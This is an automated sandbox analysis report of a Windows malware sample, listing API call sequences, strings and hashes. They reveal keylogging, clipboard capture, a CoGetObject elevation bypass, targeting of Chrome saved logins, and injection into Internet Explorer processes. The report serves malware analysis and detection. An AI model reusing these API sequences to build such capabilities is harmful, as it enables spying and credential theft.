                                                                                                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                              • API String ID: 726551946-3025026198
                                                                                                                                                                                              • Opcode ID: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                                                                                                                                                              • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
APIs
• GetForegroundWindow.USER32 ref: 00409B3F
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
• GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?), ref: 00409B67
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: X[G
• API String ID: 1888522110-739899062
APIs
• _wcslen.LIBCMT ref: 00406788
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
• GetLastError.KERNEL32 ref: 00419945
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B539
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B546
  • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
• GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B580
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B593
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
• Keylogger initialization failure: error , xrefs: 00409A32
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                              • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                              • API String ID: 2127411465-314212984
                                                                                                                                                                                              • Opcode ID: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                              • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01ca47e6259c52365a860d80c50150ca5f809e30565b780a3dfea60843a9f005
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                              • API String ID: 2281282204-3981147832
                                                                                                                                                                                              • Opcode ID: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                              • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15389f4d20d818ee95bf8d757abcbf9e71d2a033ca16b4e774801a1882311dd6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • UserProfile, xrefs: 0040B227
                                                                                                                                                                                              • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                              • API String ID: 2018770650-1062637481
                                                                                                                                                                                              • Opcode ID: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                              • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                                                                                                              • Opcode Fuzzy Hash: d28def7c9280aa2a9c215b56ee10fe1cde150d05b3267e349477c4c7a3166050
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                              • API String ID: 3534403312-3733053543
                                                                                                                                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4043647387-0
                                                                                                                                                                                              • Opcode ID: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                              • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 276877138-0
                                                                                                                                                                                              • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                              • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                              • String ID: @CG$XCG$>G
                                                                                                                                                                                              • API String ID: 341183262-3030817687
                                                                                                                                                                                              • Opcode ID: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                              • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                                                                                              • Opcode Fuzzy Hash: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                              • API String ID: 1589313981-1420736420
                                                                                                                                                                                              • Opcode ID: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
                                                                                                                                                                                              • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045128C
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512B5
                                                                                                                                                                                              • GetACP.KERNEL32 ref: 004512CA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                              • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                              • String ID: SETTINGS
                                                                                                                                                                                              • API String ID: 3473537107-594951305
                                                                                                                                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                              • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                              • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514D3
                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004515A4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                              • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1157919129-0
                                                                                                                                                                                              • Opcode ID: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                                                                                                                                                              • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
